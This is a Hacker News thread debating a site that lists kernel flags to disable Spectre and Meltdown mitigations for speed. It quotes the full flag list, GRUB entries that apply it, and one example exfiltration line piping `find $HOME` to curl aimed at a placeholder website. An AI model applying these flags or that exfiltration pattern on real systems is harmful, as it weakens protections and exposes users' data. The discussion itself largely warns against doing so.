Make Linux Fast Again (2019) (make-linux-fast-again.com)
368 points by laurentdc on April 10, 2020 | 314 comments




TBH it's entirely in character with "make X Y again" to give some recommendations that are super straightforward and sound appealing, don't make a case that X is in fact no longer Y, completely ignore why those recommendations haven't been implemented thus far, and don't spend any time thinking about whether there's even the slightest downside to those recommendations (which are in fact super dangerous/harmful).


The most essential person in kernel dev linked this just the other day, presumably seriously, in reply to an AMA question:

    75 points · 2 days ago
    
    If my environment doesn't need to worry about
    executing malicious code and I want syscalls to
    happen as fast as possible, is there a single/simple
    option to disable all the performance killing
    hardware mitigations?

    gregkh Verified 183 points · 2 days ago
    
    https://make-linux-fast-again.com/
https://www.reddit.com/r/linux/comments/fx5e4v/im_greg_kroah...


Sure. That's a very big "if," and the most essential person in kernel dev has the ability to make that the default if he wants. There's a reason he hasn't.

(If your environment actually doesn't need to worry about executing malicious code and you want to make syscalls as fast as possible, try a unikernel or implementing your code in a kernel module. Or, depending on what you're doing, try kernel bypass to get to the devices you care about and use something like https://lwn.net/SubscriberLink/816298/4aed890ee2dbffff/ to pin your user code to certain cores and get the kernel completely out of the way. Having to transition out of user mode to access hardware instead of making plain function calls, having to change page tables between processes, etc. are all performance-killing mitigations of their own. http://www.csl.cornell.edu/~delimitrou/papers/2019.asplos.xc... found a 27x performance improvement by getting rid of the privilege boundary between userspace and kernelspace - if you really care about performance and really don't care about malicious code, why would you leave a 27x speedup on the table and worry about a small percentage improvement from these flags??)
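To make the core-pinning route concrete, here is a rough sketch (the core number and binary name are placeholders, not from the linked articles):

```shell
# Boot-time: keep the scheduler, timer ticks, and RCU callbacks off core 3
# by adding to the kernel command line:
#   isolcpus=3 nohz_full=3 rcu_nocbs=3
# Runtime: pin the latency-critical process onto the reserved core with
# taskset (util-linux). Demonstrated on core 0 with a trivial command so
# the line runs anywhere; in practice: taskset -c 3 ./your-binary
taskset -c 0 sh -c 'echo running pinned'
```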


I don't agree.

Telling people to write in kernel mode if they care about performance isn't realistic. For most people that would mean completely rewriting their code from scratch, foregoing high-level software stacks and languages, giving up on most databases, giving up on all manner of tools and techniques for high-velocity software development, giving up fault tolerance, dealing directly with fiddly hardware issues (when do I need a TLB shootdown?), etc.

Whereas disabling spectre mitigations is a one-line config change.

For use cases where local system security really doesn't matter (of which there are a lot, let's be honest), a one-line config change for a 25% (or whatever it is now) performance boost is a pretty damned good deal.
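For concreteness, on a GRUB-based distro the one-line change might look like this (Debian/Ubuntu file layout assumed; on newer kernels the single `mitigations=off` switch replaces the longer per-vulnerability flag list the site gives for older kernels):

```shell
# /etc/default/grub  (file layout varies by distro)
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash mitigations=off"

# Then regenerate the boot config and reboot:
#   sudo update-grub && sudo reboot
```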


I'm not sure I agree that cases where local system security really doesn't matter and performance matters are that plentiful, but I am happy to be convinced otherwise. In particular, just about any personal computing context doesn't count - you'd have to not run mutually-untrusted third-party code. That rules out web browsers with JavaScript, that rules out Android/iOS-style independent apps, etc. Sure, if you use the web without dynamic content and you use local office suites you're fine, but on the other hand, you don't really care about performance - a 486 will deliver enough performance to read textual content and run a word processor and spreadsheet.

Gaming is a context where you care about performance and you aren't using multiple apps at once, but (and I admit this is a bit of a naive guess) I'd be surprised if it's syscall-bound. It seems like performance is likely to be I/O-bound (getting assets from disk into memory), CPU-bound, and GPU-bound, but are you really making large numbers of syscalls? (Maybe this matters in online gaming?)

So that leaves basically some specific server workloads, and at that point I think some of these techniques start to be realistic. Pinning your work onto a core and using kernel-bypass networking is a pretty straightforward technique these days. It's not quite as easy as using the kernel interfaces, but it's pretty close, and it's definitely worth investing some engineering effort into if you care about performance - you can get much more than 25% speedups.

I agree that writing in kernel mode is generally unrealistic (although if you're writing a kernel module for Linux, you still don't need to care about fiddly hardware issues - you've got the rest of Linux still running). Mostly I'd like to see more work like the paper I linked - there should be a standard build of Linux which has hardware privilege separation turned off for use in the cases where you actually can avoid hardware privilege separation (single-user VMs on cloud hosts, single-user data crunching machines, dedicated single-tenant database servers, game consoles without web browsers, ebook readers without web browsers, etc.), or at least a flag to spawn a process and leave it in ring 0. If the use cases are plentiful, this seems like it would be valuable for lots of people - and it'd also make it clear that this generally isn't an option you want on personal computers. (But I think the reason this hasn't been done in the last several decades is that there aren't actually that many use cases that are both genuinely single-user and syscall-bound.)


If you think a 486 is sufficient for reading textual content and running a word processor and spreadsheet, you haven't been paying attention to software bloat. A 486 would have a hard time just booting a modern OS, never mind the application software.


Dig up a copy of WordPerfect 6 from somewhere, no need to boot a modern OS.

(More to the point - the solution to software bloat isn't to get rid of security protections so that the bloat has room to grow.)


Could use Geoworks also. Pointy clicky on even XTs, it would absolutely fly on any 486.


> So that leaves basically some specific server workloads,

The vast majority of servers don't run any untrusted code. Servers tend to do lots of syscalls for network I/O.

> Gaming is a context where you care about performance and you aren't using multiple apps at once, but (and I admit this is a bit of a naive guess) I'd be surprised if it's syscall-bound.

I would expect that interfacing with the GPU involves a fair number of syscalls -- but admittedly I'm also guessing.


> single-user VMs on cloud hosts, single-user data crunching machines, dedicated single-tenant database servers, game consoles without web browsers, ebook readers without web browsers

This is a lot of cases. I'd love to get 25% perf back on postgres, or 25% back on my air-gapped DAW, etc. etc.


Benchmark it - your air-gapped DAW is almost certainly spending very little of its time making system calls, and depending on workload, your Postgres probably isn't either. You'll get 25% back on syscall-heavy workloads but your workloads probably aren't syscall-heavy.
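One quick way to check, sketched below: `strace -c` prints a per-syscall time summary. (Profiling `true` here only as a stand-in; in practice attach to the real process with `strace -c -p <pid>` for a while under load.)

```shell
# If the "% time" column is dominated by a handful of syscalls and the
# totals are large, the workload may actually be syscall-bound; if total
# syscall time is tiny, the mitigations can't be costing you much.
# Falls back with a hint if strace is not installed.
if command -v strace >/dev/null 2>&1; then
    strace -c true 2>&1 | tail -n 5
else
    echo "strace not installed; try 'perf stat -e raw_syscalls:sys_enter' instead"
fi
```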


I would rather just enable this stuff, honestly. Which I think is the point.


Yes, that's precisely my point - the webpage appeals to people who want easy answers whether or not the problem has easy answers.


> a 486 will deliver enough performance to read textual content and run a word processor and spreadsheet.

Are you still running Visicalc?

I have seen, used, and maintained spreadsheet applications that are irritatingly slow on an eight-core i8 with 8 GB of RAM and an SSD.

Granted, this was on Windows, but nonetheless the idea that end users only need a 486 is ridiculous at best and probably insulting.


While we're being honest, how many programs that get written are so desperate for performance that the only thing left to do is turn off security? And are the people who are able to even make this determination the kind of people for whom making a kernel module is unrealistic?


Your comment would make sense if GP had written "but writing kernel mode code is very hard and only really smart people can do it".

But they wrote something completely different. It seems to me like you just totally ignored their comment. What's the point of that?


I didn't ignore it. My point is, the kind of people who truly need this kind of performance are already translating hotspots to assembler and so on, a kernel module is plenty practical for them. For nearly all computer users there is no excuse for turning off these mitigations.


I don't know. If I'm running an application server with only my own code on a dedicated server, and I can flip some switches to make it go faster, then that's pretty nice, no? Might save me from upgrading to a bigger (pricier) server. What am I missing?

I mean, sure, that site is nuts, it sorely needs documentation. But not every scenario needs Spectre protection.


The problem with the scenario you describe is: how will you ensure that no one ever forgets that this server is vulnerable and can never be used for certain things? And everyone on here advocating turning off the mitigations is assuming the only exploits are the ones we know about. But when has that ever been the case? If more people turn off the mitigations, black hats will be invested in finding ways to exploit them that we haven't realised before.


Two comments down, he says to only use that if you know exactly what you're doing, as that set is not secure for most people.


Correct, but 'geofft's criticism of it isn't great, in my opinion. Reading it makes it obvious what it does, and only a fool would disable security mitigations in a situation where it mattered. The link has significant value in being a quick and easy way to direct people to information, and it seems nonsensical to criticize it for things which don't particularly apply.


> only a fool would disable security mitigations in a situation where it mattered.

Are we reading the same HN threads on this page? I'm seeing people who I don't consider to be stupid, who obviously have some Linux knowledge, still advocating that user accounts are a waste of time for most desktops.

If anyone is smart enough and knows enough about Spectre/Meltdown to understand the risks they're taking, they are also smart enough to search online how to disable the kernel protections. The commands aren't hard to find.

If anyone is not smart enough to find that information online for themselves, they also don't have enough knowledge to make an informed decision about whether or not it's safe for them to run.

In both cases, there is value in forcing users to display a modicum of knowledge about even just the fact that Spectre/Meltdown exist before we give them a command to run that turns off an important security setting. Anyone who knows anything about Spectre/Meltdown already knows that the mitigations affect performance. They should already know what to search for online without the aid of no-context commands being pasted at the top of HN.


> Are we reading the same HN threads on this page? I'm seeing people who I don't consider to be stupid, who obviously have some Linux knowledge, still advocating that user accounts are a waste of time for most desktops.

A fool isn't necessarily stupid: plenty of people have knowledge yet terrible judgement.

> If anyone is smart enough and knows enough about Spectre/Meltdown to understand the risks they're taking, they are also smart enough to search online how to disable the kernel protections. The commands aren't hard to find.

> If anyone is not smart enough to find that information online for themselves, they also don't have enough knowledge to make an informed decision about whether or not it's safe for them to run.

> In both cases, there is value in forcing users to display a modicum of knowledge about even just the fact that Spectre/Meltdown exist before we give them a command to run that turns off an important security setting. Anyone who knows anything about Spectre/Meltdown already knows that the mitigations affect performance. They should already know what to search for online without the aid of no-context commands being pasted at the top of HN.

You're considering it as advice, when really it should be considered more like a DOI.


> A fool isn't necessarily stupid: plenty of people have knowledge yet terrible judgement.

Then I'm not sure why you disagree with my criticism - I'm claiming that this page appeals to people who have knowledge in this matter but have not done the deep thinking to have wisdom in this matter. There are plenty of smart people who find "Make X Y again" for other values of X and Y appealing.


I'm claiming it functions more like a DOI or other identifier than a sales pitch. I don't think there's a ton of deep thinking involved: there will always be someone who's willing to run a web browser as root on their main system; you can't stop people who are set on something foolish from doing it, but if you can make it more convenient for people who have valid reasons, why not?

This all might be a bit too much serious thought for what was intended as a joke initially (the site, not my comments), though.


> still advocating that user accounts are a waste of time for most desktops.

I mean, phones and tablets do fine without any user-like abstraction. You can sandbox apps without having a concept of multitenancy.


Every Android app runs as a different UID.

I'm not sure what you mean by "concept of multitenancy," but if you want to "sandbox apps," you cannot let side-channel attacks break that sandbox.


iPads do have a concept of multiple users, though only one can use it at once.


Android differentiates between user processes and root processes. I'm pretty sure iOS does as well, although maybe they've coded it as something weird.

I'm not seeing people here arguing that Linux could get by with only supporting 1 user account. I'm seeing people argue that the biggest reason they avoid running as root is just because userland applications complain about it. It's very difficult to do sandboxing if there isn't some kind of differentiation between a privileged and unprivileged process.

Regardless, Linux also doesn't really have good sandboxing by default, so I'm not completely sure what you're getting at. It's still a bad idea for people to run a Linux system as root.


iOS has a root user, that your code does not run as.


> Reading it makes it obvious what it does, and only a fool would disable security mitigations in a situation where it mattered.

I disagree. Most users do not understand how speculative side channels work or how they might be affected; many people's experience with Meltdown and Spectre is "my games got slower because of some magical speculative stuff that I don't really understand". Making an informed decision on this is hard.


I may be overestimating them, but I imagine this applies drastically less to your average Linux user who knows how to actually apply this.


The average Linux user will not understand the implications. Heck, most don't even know the security trade-offs of X11 (which are relatively simple to discover and understand).

Leave the HN bubble and go to an average Linux forum. You would be surprised what kind of advice people give or what people are willing to copy and paste into their terminal ;).

This is not meant as a criticism. Most people, including many Linux users, just use their computer as a tool and will just do anything to get it running as they want.


I think you're overestimating the average Linux user.


I could see it.


Do you have an example of a situation where it does not in fact matter, and do you have a benchmark of the speedup?


Most offline systems, and many systems used only for running trusted code (which obviously bars anything with a web browser, and most internet-connected personal computing devices, among other things). Applications along the lines of scientific number-crunching, for example, generally run on systems where security doesn't matter much.

There's a case to be made for gaming, and the mitigations if I remember correctly definitely ding performance on quite a few games, but because most computers used for games have significant amounts of sensitive information on them, among other things, I don't think it really holds well.

Benchmarks (I really dislike linking to this site, but given it did a bunch of benchmarks, it's not the worst thing, I guess):

'Up to 50% performance loss!' is obviously clickbait, and I disagree with a lot of the wording & conclusions & so on, but there's definitely some workloads where the trade-off makes sense.

https://www.phoronix.com/scan.php?page=article&item=linux-42...

https://www.phoronix.com/scan.php?page=article&item=linux-42...

Warning about those benchmarks, though: they're of a rather old kernel version, and I imagine the mitigations tank performance less now. However, given that 5.x has, to my knowledge, been performing way worse than 4.x, 4.x is probably what most people would be using for these sorts of things.

EDIT, added section below:

Ah, here we go; how it's affecting modern stuff:

https://www.phoronix.com/scan.php?page=article&item=spectre-...

The mitigations ding it a reasonable amount for a substantial amount of workloads, though it's not as intense as it used to be.


Are systems used for "scientific number-crunching" really applicable in this case? While some departments may have those on a separate network, not connected to the internet at large, I have never heard of a system employed for research tasks being completely air gapped. Otherwise, accessing and working on data would be prohibitively harder. Would such a trade-off be worth the potential gains by deactivating mitigations?

Also, may I ask why you dislike Phoronix? I personally enjoy their articles, and the benchmark suite they have developed seems very well-rounded and transparent. I wouldn't count the statement concerning the ~50% increase in time it takes to complete a certain task on 4.20 as clickbait, considering it was never used in the linked article's title to hook readers and gain clicks.

Honestly, I have yet to see a large and popular enough use-case that both allows for a completely air-gapped system and heavily benefits from disabling mitigations, to such an extent that an admin couldn't just look up the flags required. If I, as an admin, made the conscious choice of going so far as to disable these patches, I would also want to at least re-read whether this is truly significantly advantageous, rather than copying a line from a website with no context or further information on the current state and impact on performance.


It'd be nice to be able to easily boot into, or toggle into, a performance optimized, disabled mitigations environment to do something while offline.. many computer uses don't require being connected to other computers. I've gotten into the habit of hotplugging my Ethernet connection, personally.


You can actually do that fairly easily, just add the parameters linked to a second boot entry in GRUB.
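A sketch of what that second entry could look like (everything here, the UUID and the kernel and initrd paths, is a placeholder; the reliable approach is to copy a known-good `menuentry` block out of your generated `/boot/grub/grub.cfg` and append the parameters):

```shell
# /etc/grub.d/40_custom -- extra menu entry with mitigations disabled
menuentry "Linux (mitigations off)" {
    search --no-floppy --fs-uuid --set=root YOUR-ROOT-UUID
    linux  /boot/vmlinuz root=UUID=YOUR-ROOT-UUID ro mitigations=off
    initrd /boot/initrd.img
}
# Regenerate the config afterwards:  sudo update-grub
```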

However, I would very much not advise doing so, as I am still unaware of any task that can both be done without a network connection and is significantly slowed down by the mitigations, after recent improvements to the kernel and software. Basically, the potential benefit is very low for a lot of tasks, whilst requiring additional security measures (ideally a fully air-gapped system) and a reboot every time you'd do such a task.

Also note that, in theory, just being temporarily offline may not shield from being exploited fully.


As an example (the only case that I've identified personally), if you're curious: I have a (Windows; Intel Q6600) box that I use for gaming occasionally. A single-player game I like, Total War: Shogun 2, runs at about 55 fps (benchmark) pre-Meltdown/Spectre/etc. Now it gets ~22 fps. I can use https://www.grc.com/inspectre.htm to toggle some mitigations to get it playable again.


...doesn't that exactly answer the question that was asked??


Very well said.

I would add that it is also needlessly antagonistic, in addition to being in poor taste.


To be clear: I mean that using "Make X Y Again" is antagonistic and in poor taste. GP of this comment is well stated and accurate.


[flagged]


The issue isn't bad taste, it's starting flamewars. Please don't.

https://news.ycombinator.com/newsguidelines.html


I'm not aware of any examples where "Make X Y Again" was a positive thing.


We're all smart enough to read between the lines here: although you've barely avoided saying 'Trump', this is very clearly a political message.

One of the reasons I like HN is it generally avoids such shallow political talk.


Is there a possibility this whole project is in jest? It's called "Make Linux Fast Again", and it deliberately disables reasonable security measures to achieve its goal. Could be a political statement in the negative!


I don't know, the website went away really fast. :-)

I could see legitimate use for un-networked computers.


The crisis has changed people's online behavior, and the shallow culture of other sites is becoming normalized on HN. Please flag where appropriate.


[flagged]


Please take the time to read this over:

https://news.ycombinator.com/newsguidelines.html


There isn't a high bar of 'deepness' required here, but thinly veiled political insults with zero substance don't meet it.

I'll pull something out of the guidelines jshrevek posted for those who don't want to read through the whole thing:

> Please don't use Hacker News for political or ideological battle. That destroys the curiosity this site exists for.

I'll add that using the term 'gross idiocy' also violates these guidelines.


Thank you for responding politely and meaningfully to the snarky, partisan flamebait.


The quality of comments on hacker news is due to the high bar for thoughtfulness and respect. Not from a restriction blocking any "political" discussion.

The linked content (disable security features to improve performance) is very clearly a relevant topic for hacker news and the apparent association between the linked domain and Trump's infamous catch-phrase seems like an intentional choice that is worth discussing.


>linked content (disable security features to improve performance) is very clearly a relevant topic for hacker

True, but not relevant to issues of partisanship and ideological battle.

>domain and Trump's infamous catch-phrase seems like an intentional choice that is worth discussing.

Theoretically, maybe. In practice, well, take a look at the actual quality of the comments being made.


There is a restriction, actually. This is pulled from the guidelines:

> Please don't use Hacker News for political or ideological battle. That destroys the curiosity this site exists for.


It is possible to discuss a political topic without the discussion becoming a "political or ideological battle".

It's definitely challenging, but it is possible.


I think it is a real problem that someone should try to solve. I visit a good number of expert communities and they all tend to be highly on topic. This is a good thing without question but I've often noticed the community is completely oblivious to what happens outside their bubble. I suspect most of the accidental battles are from being years behind on the discussion with the people they've talked with every day for the last decade or so.

I don't claim to have a solution. Programming philosophy or Programming politics do not seem very attractive but I do suspect there to be a big adventure behind those curtains. It's not like code is not political, lacks a philosophy or ideology. But the best we could do was "stop spying on me!"? hah


It is certainly very possible to do that, and it almost always requires sharing new information that relates to the context of the discussion.


Yes, that's the point of this site - if your workflow is hurt by the perf impact of mitigations and SPECTRE & friends are not a credible attack, for instance because you disable JS by default, then you can just curl and pipe this to your kernel parameters
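Before (and after) doing that, the kernel will tell you which mitigations it currently considers active; a quick way to check:

```shell
# Each file reports one vulnerability's status on this CPU/kernel combo,
# e.g. "Mitigation: PTI" or "Not affected". The directory exists on
# kernels since roughly 4.15.
grep -r . /sys/devices/system/cpu/vulnerabilities/ 2>/dev/null \
    || echo "vulnerabilities directory not present on this kernel"
```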


To be clear, SPECTRE leaks privileged memory at the OS level -- up to, in some cases, allowing arbitrary virtual memory reads.

While Javascript is the most likely attack vector for most people, you should not use this command on a system that's running untrusted code from anywhere in any context, and you should consider moving sensitive information like passwords off of the computer.

I use uMatrix to disable Javascript by default on every site I visit, and I still would not feel safe running this command on anything other than a single-purpose device.

That's not to say that there would never be a good reason to run it. A very imprecise, easy test I would propose is, "is your Linux system vetted enough or just unimportant enough that you would feel comfortable getting rid of users and running all of your software as root?" In which case, SPECTRE & friends is probably not a credible threat to you on that machine.


Only if you are using multiple accounts and you are concerned about privilege escalation. But let's be honest: most people use only one user account, with sudo rights, and probably without a sudo password, because entering it 1000 times a day is a pain.

Thus every program can access everything without doing anything special: it just needs to spawn a process to read files around the filesystem, or, assuming you have passwordless sudo, gain root access and read /dev/mem. That is simpler than performing a SPECTRE attack.

So who needs these mitigations? Those who run containers or sandboxes where untrusted code is meant to be isolated. Browsers are an example, but they have specific mitigations anyway, and pulling off an attack from JS is really not that simple. So really, I'm not so worried about SPECTRE for typical desktop usage.

Of course, if we talk about servers, they are very important.


> But let's be honest, most people use only one user account, with sudo rights, and probably without sudo password because inserting them 1000 times a day is a pain.

The solution is to teach those users how to use sudo properly, not to teach them to be even more insecure than they already are.

It's like saying, "I don't need to wear a seatbelt because I already drive my car at 90mph everywhere, so the seatbelt wouldn't make a difference in a crash anyway."

If you have sudo set up without a password, fix that crud! This is not a new concept, the Linux community has been warning people about unprotected root access for over a decade.


The concept is crud. For a personal computing device, at least. Why should I bother following conventions which have nothing in common AT ALL with personal use, and which were instead historically shaped by the needs of accountability and billing?


They are remotely exploitable without the mitigations in place.

https://mlq.me/download/netspectre.pdf


> you should not use this command on a system that's running untrusted code from anywhere in any context

I don't really understand this point.

Any program you download from the internet, say, VLC or Kodi or a game emulator or whatever, can already do `find $HOME | curl -F my.totally-legitimate.website` and read the memory of all the processes of your user with a script that'd involve `ps -u` and `/proc/yourpid/maps`, mitigations or not, unless you use something like QubesOS (but most people do not).

Leaking bits with spectre would be a super long process versus... just doing that if you could already get the user to download your code.


> Any program you download from the internet, say, VLC or Kodi or a game emulator or whatever, can already do `find $HOME | curl -F my.totally-legitimate.website` and read the memory of all the processes of your user

There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?

I'm not going to argue Linux sandboxing is awesome -- it's very clearly not. But user permissions are a big part of what security we do have. Spectre/Meltdown also limit the effectiveness of the newer sandboxing features we're getting from packaging systems like Flatpak. Maybe you're not running any of that stuff on your system, but...

I'm seeing a lot of people here being kind of blasé about the potential risks, arguing that they only need to protect themselves from websites, and I am skeptical that all of those people actually understand the full extent of these vulnerabilities.


On a single owner desktop system, isn't kernel memory strictly less interesting than user memory, for reads? All of the important things, like passwords and emails and secret keys, are in user space memory or in the user readable file system, generally...


Disk decryption passwords / keys could show up in kernel memory.


which is used to get

> All of the important things, like passwords and emails and secret keys, are in user space memory or in the user readable file system, generally...

In this scenario in OP's comment, user-accessible stuff is still more interesting than kernel things.


> Why aren't you running all your software as root?

A lot of software gets snippy when you try to run it as root. That said, the biggest advantage of non-root is protecting myself from fucking up my own system.

XKCD relevant: https://xkcd.com/1200/

If somebody gets access to my user account, they can't change my system files, but they can literally buy an entire new PC with my money, on which they can then presumably change whatever system files they want. I hope that example outlines how pointless root protection is in a modern consumer PC.


> they can't change my system files, but they can literally buy an entire new PC with my money

This is a problem that's fixable with additional security measures, but only if you haven't granted everyone root access.

You can set up ssh with appropriate privileges and chown private keys so that they require a password to access. You can run certain programs like games as unprivileged users without full access to your $HOME directory. You can start using Flatpak and Wayland. Unless you have a Spectre/Meltdown vulnerability, in which case most of that is pointless.
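As a small illustration of the key-permissions part (using a scratch directory so it's harmless to run anywhere; apply the same modes to the real `~/.ssh` and its keys):

```shell
# Owner-only directory and key file; a private key that any local process
# can read defeats the point of having one.
demo=$(mktemp -d)
touch "$demo/id_ed25519"
chmod 700 "$demo"
chmod 600 "$demo/id_ed25519"
stat -c '%a %n' "$demo" "$demo/id_ed25519"
rm -rf "$demo"
```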

I don't understand the mentality that says, "my system is broadly insecure, so I'd better make it impossible to secure." I mention this elsewhere[0], but a big part of getting to a secure Linux system is patching the holes we can right now.

[0]: https://news.ycombinator.com/item?id=22833614


Yeah but I will do none of those things. So why also make my system slow on top of insecure?

Broadly, my security profile is "if a remote user can execute code on my system, I have already lost as hard as it's possible to lose."


> There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?

Only somewhat devil's advocate: Software running as root can accidentally delete important files. I run software as non-root to prevent myself from my silly mistakes. You don't accidentally leak information through SPECTRE.


> There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?

I'll be honest, because that's the default on Linux (I'd make the effort to do that for my personal things at least - I'd never do that on computers with shared accounts or with work-related data).

https://xkcd.com/1200 is as true as it ever was.


How can they read your email if you have locked your computer?


"While I'm logged in"


It's not that the vulnerability isn't dangerous. It's that there are already _so_ many other vulnerabilities that, outside of maybe JavaScript, it doesn't make a whole lot of difference. Desktop Linux security is basically this: https://i.redd.it/bqk0cv1r56c41.png Why worry about a hole in the fence gate when anyone can just walk around it?


The problem is that there are like 4 or 5 efforts going on in Linux right now to make things more secure. But they're all kind of targeted, and we need all of them to coordinate with each other, so individually each of them gets dismissed because "what's the point of plugging one hole?"

People mention $HOME access. This is something that we're trying to solve with Flatpak: filesystem access should be sandboxed by default. But that requires coordination with desktop environments like Gnome; otherwise everyone just grants programs anything they want because the UX is bad.

And then on top of that we have X11, which is its own mess, and we're trying to address that with Wayland. But Wayland isn't perfect yet for desktop recording, and there's not a ton of effort from software like Emacs to get off of X and onto Wayland because of "what's the point?" arguments. So Flatpak becomes a lot less valuable because X11 keylogging is so easy.

Then we have just flat-out bad user security, where people are setting up sudo without a password. So process isolation becomes a lot less valuable because programs can just manipulate the raw filesystem.

And then we have Spectre/Meltdown leaking passwords, but who cares, because "people don't set passwords anyway"?

And whenever a group of people get together and propose any fixes in isolation, there is inevitably someone in the Linux community who will stand up and say, "Look, Wayland is pointless because someone wrote a keylogger[0]. Why are we spending any time fixing this stuff?"

Imagine you are on a boat with 10 holes in the bottom, all of them leaking water. If you want to fix that problem, there is inevitably going to be a period where 5 of the holes are patched and 5 of them aren't. And if you get to that point and start re-opening the holes that did get patched, it's going to be very hard to make any more progress.

[0]: https://github.com/Aishou/wayland-keylogger


It's not that the desktop "linux" developers don't care about security. But there's simply not enough manpower behind it. The linux kernel is only secure because that's what the cloud companies with a shit ton of money care about. They don't care about desktop.


I don't think reality is quite like your little image here. There is no absolute security, ever, but we can create layers of difficulty for attackers as appropriate for our threat models. Someone with a reasonable amount of expertise and caution can use Linux on a personal computer in ways that make it very nearly impossible for a typical "criminal level" hacker (as opposed to nation-state level hacker) to steal information from them. Yes, that means not downloading arbitrary executables from the net, among other things, and certainly not running arbitrary code from the net like Javascript. When you do need to run something untrusted, run it isolated in a VM, etc. If you do these kinds of things, then it makes sense to also use stuff like Spectre mitigations.


That's not necessarily true; there have been several security layers added these past few years. The YAMA LSM prevents a user process from reading the memory of processes that are not its children. It's already enabled by default in Ubuntu (but not Fedora; they decided to keep it disabled by default so that user gdb still works).

There are definitely still holes in the Linux security model, especially regarding file access (any user process having access to all the user's files is far too broad), but that doesn't mean we should just leave known vulnerabilities open, especially since an attacker may not have all methods of attack available.


Don't browsers fudge the accuracy of the available clocks already to mitigate SPECTRE?


I would appreciate someone else who knows more than me about the current state of these attacks and more than me about Linux security in general answering this question. Take what I'm about to say with a grain of salt.

My understanding is that Firefox still reduces timer accuracy; Chrome did too, but increased timer accuracy again after adding other protections. I'm not sure if Chrome's protections rely on Meltdown vulnerabilities being patched at the OS level or not. It's been a while since I checked back on what the status was there, so I might be wrong.

There are also some concerns about shared memory buffers, which is why I think some of the features around them haven't been enabled in WASM yet. I haven't checked the status on that stuff in a while either.

In any case, for a vulnerability of this scale I bias towards saying people should practice defense in depth. Sometimes browsers have bugs in them, and this would be a particularly bad one. And again, there are userland native apps and systems and package managers that people need to worry about that go beyond browsers.


Yes, but this doesn’t actually fix the issue; it just makes exploiting it harder. Fundamentally, even if you fudge clocks you can still average out things with enough measurements, and if you remove all of them you can busyloop and count iterations of that instead as a “timer”.


They had to disable shared memory APIs for threading in JavaScript, because those could be used to implement accurate enough "clocks". That was a temporary measure and last I checked some browsers enabled them again once the memory access itself was patched. So by removing the memory access patch you are once again fully vulnerable.


This just makes the attack harder, I was told. There are arguably plenty of ways to measure time within JavaScript without even a clock; you cannot disable that.
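
The "measure time without a clock" idea mentioned in this subthread can be sketched quickly. Below is a toy illustration in Python rather than JS (names are mine, and a Python counter thread is far coarser than the SharedArrayBuffer counter a real attack would use) - the point is only that a spinning counter is itself a timer:

```python
import threading
import time

class CounterClock:
    """A 'timer' built from nothing but a spinning thread.

    Read .ticks before and after an operation; the difference is a
    (noisy) measure of elapsed time, with no timer API involved.
    """
    def __init__(self):
        self.ticks = 0
        self._running = True
        self._thread = threading.Thread(target=self._spin, daemon=True)
        self._thread.start()

    def _spin(self):
        # Spin as fast as possible; each iteration is one "tick".
        while self._running:
            self.ticks += 1

    def stop(self):
        self._running = False
        self._thread.join()

clk = CounterClock()

t0 = clk.ticks
time.sleep(0.1)    # stand-in for a "slow" (e.g. uncached) operation
slow = clk.ticks - t0

t0 = clk.ticks
time.sleep(0.01)   # stand-in for a "fast" (e.g. cached) operation
fast = clk.ticks - t0

clk.stop()
print(slow, fast)  # the longer operation accumulates more ticks
```

Coarsening or jittering the explicit timer APIs does nothing to this counter; it only adds noise that more samples can average away.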


Reducing timer resolution was done early on as a quick reaction by browser developers when Spectre & Meltdown were first publicized.

All an attacker needs to do is distinguish between a cached and non-cached memory read - i.e., was accessing some variable "faster" or "slower". There are lots and lots of ways to measure this. A good whitepaper is "Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in Javascript".

The TLDR is that timer resolution reduction is ineffective as a speculative attack mitigation.


> Yes, that's the point of this site

Sorry - was just providing a bit more information for those of us who didn't immediately grok the point of a site which is literally just:

noibrs noibpb nopti nospectre_v2 nospectre_v1 l1tf=off nospec_store_bypass_disable no_stf_barrier mds=off tsx=on tsx_async_abort=off mitigations=off
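
For anyone wondering how these are actually applied: they are kernel command-line parameters, typically added to the bootloader config. A sketch for a Debian/Ubuntu-style GRUB setup (the variable name and regeneration command vary by distro):

```
# /etc/default/grub -- append the flags to the kernel command line:
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash noibrs noibpb nopti nospectre_v2 nospectre_v1 l1tf=off nospec_store_bypass_disable no_stf_barrier mds=off tsx=on tsx_async_abort=off mitigations=off"

# Then regenerate the config and reboot:
#   sudo update-grub                                # Debian/Ubuntu
#   sudo grub2-mkconfig -o /boot/grub2/grub.cfg     # Fedora/RHEL-style
```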


Hm, I'm not a native English speaker - was my tone incorrect? I was just trying to add more context.


I thought your tone was fine, but the phrase "Yes, that's the point..." can sometimes (not always) be associated with a condescending, sometimes even impatient, tone. It's not intrinsic to the phrase, it depends on what the reader may associate with the phrase. (I'm also not saying this actually happened in this case, I'm just speaking generally.)


Agreed, and the part that may be difficult for a non-native speaker to get is what other words would give the same meaning but seem less confrontational: e.g. "Yes, that's the intent..." conveys the same meaning but with a milder tone. I think with "point" there's the suggestion of "You missed the point," which is an insult.


I think you're fine! But just to try and deconstruct... similar phrasing:

> Yes... that's the entire point of xyz -_-;

...is semi-frequently used to imply "what you said is obvious" with a sort of... dismissive undertone, which might've been what miles was reacting to. Breaking the phrase up a bit more and making it a bit more casual/chipper somehow feels harder to misinterpret this way? Even without resorting to emoji as I have here:

> Yep! That's the point of xyz :)

But I could see myself using your phrasing as a native speaker, so I wouldn't worry about it too much ¯\_(ツ)_/¯


> SPECTRE & friends are not a credible attack, for instance because you disable JS by default

That's... an extremely optimistic perspective on what's running on your system. Disabling JS in browser tab contexts (even if it's universal and not just "by default") is going to cover a pretty small percentage of SPECTRE et al. vectors.


What other vectors are there? Assuming that I trust my local software (because if I don't then spectre is the least of my problems).


> just curl and pipe this to your kernel parameters

;)


well, you're already trusting random magic incantations found on the internet, so...


That reminds me of this talk: https://www.youtube.com/watch?v=lKXe3HUG2l4


> curl and pipe this to your kernel parameters

What an incredibly convenient idea that is!

.....

AAAAAAAaaaaaaaa [screams in infosec]


Can you explain why this is dangerous? Is it because there could be executable code in what's returned?


